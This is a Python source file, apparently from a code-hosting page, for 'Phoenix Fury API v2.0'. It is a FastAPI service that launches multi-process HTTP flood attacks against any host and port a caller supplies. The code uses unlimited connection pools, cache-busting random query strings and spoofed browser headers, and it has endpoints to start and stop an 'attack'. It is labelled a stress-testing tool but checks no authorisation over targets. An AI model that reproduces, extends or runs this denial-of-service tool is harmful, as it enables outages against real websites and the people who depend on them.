4
File size: 14,122 Bytes
9cb507d
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
# ====================================================================================
#  PHOENIX FURY API v2.0 - HIGH-RPS EDITION
#
#  - RE-ARCHITECTED: Uses multiprocessing.Manager and shared memory counters
#    for near-zero overhead statistics, enabling massive RPS scaling.
#  - OPTIMIZED L7: Aggressive aiohttp connection pooling and a lean async
#    worker loop designed for maximum request throughput.
#  - SIMPLIFIED STATE: Centralized state management for instant status updates.
#
#  *** BUILT FOR MAXIMUM L7 REQUESTS PER SECOND (RPS) ***
# ====================================================================================

import socket
import struct
import random
import time
import multiprocessing
import threading
import asyncio
import aiohttp
import os
import sys
import psutil
import uvloop
from typing import Literal, Optional, List
from ctypes import c_bool, c_ulonglong

# FastAPI & Pydantic
from fastapi import FastAPI, HTTPException, BackgroundTasks
from pydantic import BaseModel, Field, validator
import uvicorn

# Apply uvloop for a faster asyncio event loop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())

# --- Application Setup & Constants ---
app = FastAPI(
    title="🔥 Phoenix Fury API v2.0",
    description="A high-RPS, multi-process L4/L7 stress testing tool. Re-architected for maximum performance. Requires root/admin privileges for Layer 4 attacks.",
    version="2.0.0"
)
CPU_COUNT = psutil.cpu_count(logical=True)
STATS_BATCH_UPDATE_SIZE = 200 # How many requests a worker makes before updating the shared counter

# --- Realistic Browser Headers ---
USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0",
]
HTTP_HEADERS = {
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate, br",
    "Connection": "keep-alive",
    "Upgrade-Insecure-Requests": "1",
    "Sec-Fetch-Dest": "document",
    "Sec-Fetch-Mode": "navigate",
    "Sec-Fetch-Site": "none",
    "Sec-Fetch-User": "?1",
    "TE": "trailers",
}

# ====================================================================================
#  GLOBAL SHARED STATE (HIGH PERFORMANCE)
# ====================================================================================
# Using a Manager is the cleanest way to share complex state between processes.
# For raw performance, Value/Event are used for high-frequency updates.
manager = multiprocessing.Manager()
STATE = manager.dict()
STOP_EVENT = multiprocessing.Event()
TOTAL_SENT_COUNTER = multiprocessing.Value(c_ulonglong, 0)

def reset_state():
    """Resets the shared state to default values."""
    STATE.clear()
    STATE.update({
        "attack_running": False,
        "attack_type": "None",
        "target_host": "None",
        "target_ip": "None",
        "port": 0,
        "duration": 0,
        "start_time": 0.0,
        "processes": 0,
        "current_rate": 0.0,
    })
    STOP_EVENT.clear()
    with TOTAL_SENT_COUNTER.get_lock():
        TOTAL_SENT_COUNTER.value = 0

reset_state() # Initialize on startup

# ====================================================================================
#  Pydantic API Models
# ====================================================================================
class L7Config(BaseModel):
    target: str = Field(..., description="Target hostname or IP address (e.g., http://example.com)")
    port: int = Field(..., ge=1, le=65535, description="Target port")
    duration: int = Field(..., ge=10, description="Attack duration in seconds")
    processes: int = Field(CPU_COUNT, ge=1, le=CPU_COUNT*4, description=f"Number of processes to spawn. Defaults to CPU cores ({CPU_COUNT}).")
    concurrency_per_process: int = Field(512, ge=1, le=4096, description="Concurrent async tasks per process.")
    method: Literal["get", "post", "head"] = Field("get", description="HTTP method.")
    path: str = Field("/", description="Request path")

class StatusResponse(BaseModel):
    attack_running: bool
    attack_type: str
    target: str
    port: int
    duration: int
    elapsed_time: float
    processes: int
    total_requests_sent: int
    current_rate_rps: float
    cpu_usage_percent: float
    memory_usage_percent: float

# ====================================================================================
#  CORE UTILS & NETWORKING
# ====================================================================================
def resolve_target(target: str) -> str:
    """Safely resolve hostname to IP."""
    try:
        # Handle URLs like http://domain.com
        if "://" in target:
            target = target.split("://")[1].split("/")[0]
        return socket.gethostbyname(target)
    except socket.gaierror:
        raise HTTPException(status_code=400, detail=f"Could not resolve hostname: {target}")

# ====================================================================================
#  HIGH-PERFORMANCE L7 WORKER
# ====================================================================================
async def l7_task(session, url, method, stop_event, shared_counter):
    """A single async task that hammers a URL in a loop."""
    local_counter = 0
    while not stop_event.is_set():
        try:
            # Add a random query param to bypass caches
            request_url = f"{url}?{random.randint(1, 99999999)}"
            async with session.request(method, request_url, ssl=False):
                local_counter += 1
                if local_counter >= STATS_BATCH_UPDATE_SIZE:
                    with shared_counter.get_lock():
                        shared_counter.value += local_counter
                    local_counter = 0
        except Exception:
            # In a stress test, we expect errors. Count them as attempts.
            local_counter += 1
            if local_counter >= STATS_BATCH_UPDATE_SIZE:
                with shared_counter.get_lock():
                    shared_counter.value += local_counter
                local_counter = 0
        # Yield control to the event loop immediately
        await asyncio.sleep(0)
    
    # Final update before exiting
    if local_counter > 0:
        with shared_counter.get_lock():
            shared_counter.value += local_counter

async def l7_worker_main(url, method, concurrency, stop_event, shared_counter):
    """Main async function for a single worker process."""
    headers = {**HTTP_HEADERS, "User-Agent": random.choice(USER_AGENTS)}
    
    # Aggressive connector settings for high RPS
    connector = aiohttp.TCPConnector(
        limit_per_host=0,  # No limit on connections per host
        limit=None,        # No limit on total connections
        force_close=False, # Reuse connections
        enable_keepalive=True,
        use_dns_cache=True,
        ttl_dns_cache=300, # Cache DNS for 5 mins
        ssl=False
    )

    timeout = aiohttp.ClientTimeout(total=10, connect=5)

    async with aiohttp.ClientSession(connector=connector, headers=headers, timeout=timeout) as session:
        tasks = [
            l7_task(session, url, method, stop_event, shared_counter)
            for _ in range(concurrency)
        ]
        await asyncio.gather(*tasks)

def l7_worker_process(target_ip, port, path, method, concurrency, stop_event, shared_counter):
    """The entry point for each spawned L7 attack process."""
    # Construct the base URL. aiohttp handles the Host header correctly.
    url = f"http://{target_ip}:{port}{path}"
    try:
        asyncio.run(l7_worker_main(url, method, concurrency, stop_event, shared_counter))
    except KeyboardInterrupt:
        pass # Allow clean exit
    except Exception as e:
        print(f"[Process {os.getpid()}] Worker error: {e}", file=sys.stderr)

# ====================================================================================
#  ATTACK MANAGER & STATE CONTROLLER
# ====================================================================================
active_processes: List[multiprocessing.Process] = []

def start_attack(config: L7Config):
    """Initiates the L7 attack."""
    if STATE["attack_running"]:
        print("Attack start requested, but one is already running.")
        return

    try:
        target_ip = resolve_target(config.target)
        
        # --- Update Global State ---
        STATE["attack_running"] = True
        STATE["target_host"] = config.target
        STATE["target_ip"] = target_ip
        STATE["port"] = config.port
        STATE["duration"] = config.duration
        STATE["attack_type"] = f"L7-{config.method.upper()}"
        STATE["start_time"] = time.time()
        STATE["processes"] = config.processes
        
        print(f"🔥 Starting {STATE['attack_type']} attack on {STATE['target_host']}:{STATE['port']} for {STATE['duration']}s")
        
        # --- Spawn Worker Processes ---
        for _ in range(config.processes):
            p = multiprocessing.Process(
                target=l7_worker_process,
                args=(
                    target_ip,
                    config.port,
                    config.path,
                    config.method,
                    config.concurrency_per_process,
                    STOP_EVENT,
                    TOTAL_SENT_COUNTER
                )
            )
            active_processes.append(p)
            p.start()
            
        # --- Schedule the stop ---
        main_thread = threading.Thread(target=timed_stop, args=(config.duration,))
        main_thread.start()

    except Exception as e:
        print(f"Failed to start attack: {e}", file=sys.stderr)
        stop_attack_immediately()


def timed_stop(duration: int):
    """Waits for the duration and then stops the attack."""
    time.sleep(duration)
    print(f"Duration of {duration}s reached. Stopping attack.")
    stop_attack_immediately()

def stop_attack_immediately():
    """Stops the attack and cleans up resources."""
    if not STATE["attack_running"]:
        return {"status": "success", "message": "No attack was running."}
        
    print("🛑 Sending stop signal to all worker processes...")
    STOP_EVENT.set()
    
    for p in active_processes:
        p.join(timeout=5) # Give processes time to exit cleanly
        if p.is_alive():
            print(f"Process {p.pid} did not terminate gracefully, forcing termination.")
            p.terminate()

    active_processes.clear()
    
    elapsed = time.time() - STATE['start_time']
    total_sent = TOTAL_SENT_COUNTER.value
    avg_rate = total_sent / elapsed if elapsed > 0 else 0
    print("="*40)
    print("✅ ATTACK TERMINATED.")
    print(f"   Total Requests: {total_sent:,}")
    print(f"   Elapsed Time:   {elapsed:.2f} seconds")
    print(f"   Average Rate:   {avg_rate:,.2f} RPS")
    print("="*40)

    reset_state()
    return {"status": "success", "message": "Attack stopped."}


def stats_calculator():
    """A background thread to calculate RPS continuously."""
    last_check_time = time.time()
    last_count = 0
    while True:
        time.sleep(1)
        if STATE["attack_running"]:
            now = time.time()
            current_count = TOTAL_SENT_COUNTER.value
            
            elapsed = now - last_check_time
            if elapsed > 0:
                rate = (current_count - last_count) / elapsed
                STATE["current_rate"] = rate
            
            last_check_time = now
            last_count = current_count
        else:
            if STATE["current_rate"] != 0:
                STATE["current_rate"] = 0
            last_count = 0


# ====================================================================================
#  FASTAPI ENDPOINTS
# ====================================================================================
@app.on_event("startup")
def on_startup():
    """Start the background stats thread."""
    reset_state()
    stats_thread = threading.Thread(target=stats_calculator, daemon=True)
    stats_thread.start()

@app.post("/attack/layer7")
def api_start_l7_attack(config: L7Config):
    if STATE["attack_running"]:
        raise HTTPException(status_code=409, detail="An attack is already in progress.")
    
    # We run the attack logic in a separate thread to not block the API response
    attack_thread = threading.Thread(target=start_attack, args=(config,))
    attack_thread.start()
    
    return {"status": "success", "message": f"L7 {config.method.upper()} attack initiated on {config.target}:{config.port}"}

@app.post("/attack/stop")
def api_stop_attack():
    if not STATE["attack_running"]:
        return {"status": "info", "message": "No attack is currently running."}

    response = stop_attack_immediately()
    return response

@app.get("/status", response_model=StatusResponse)
def get_status():
    """Provides a real-time status of the ongoing attack."""
    elapsed = (time.time() - STATE["start_time"]) if STATE["attack_running"] else 0
    return StatusResponse(
        attack_running=STATE["attack_running"],
        attack_type=STATE["attack_type"],
        target=f"{STATE['target_host']} ({STATE['target_ip']})",
        port=STATE["port"],
        duration=STATE["duration"],
        elapsed_time=round(elapsed, 2),
        processes=STATE["processes"],
        total_requests_sent=TOTAL_SENT_COUNTER.value,
        current_rate_rps=round(STATE["current_rate"], 2),
        cpu_usage_percent=psutil.cpu_percent(),
        memory_usage_percent=psutil.virtual_memory().percent
    )

@app.get("/")
def root():
    return {"message": "🔥 Phoenix Fury API v2.0 - High-RPS Edition", "docs": "/docs"}

# --- Main Execution ---
if __name__ == "__main__":
    multiprocessing.freeze_support()
    print("Phoenix Fury API v2.0 starting up...")
    print(f"Detected {CPU_COUNT} logical CPU cores.")
    uvicorn.run(app, host="0.0.0.0", port=8000)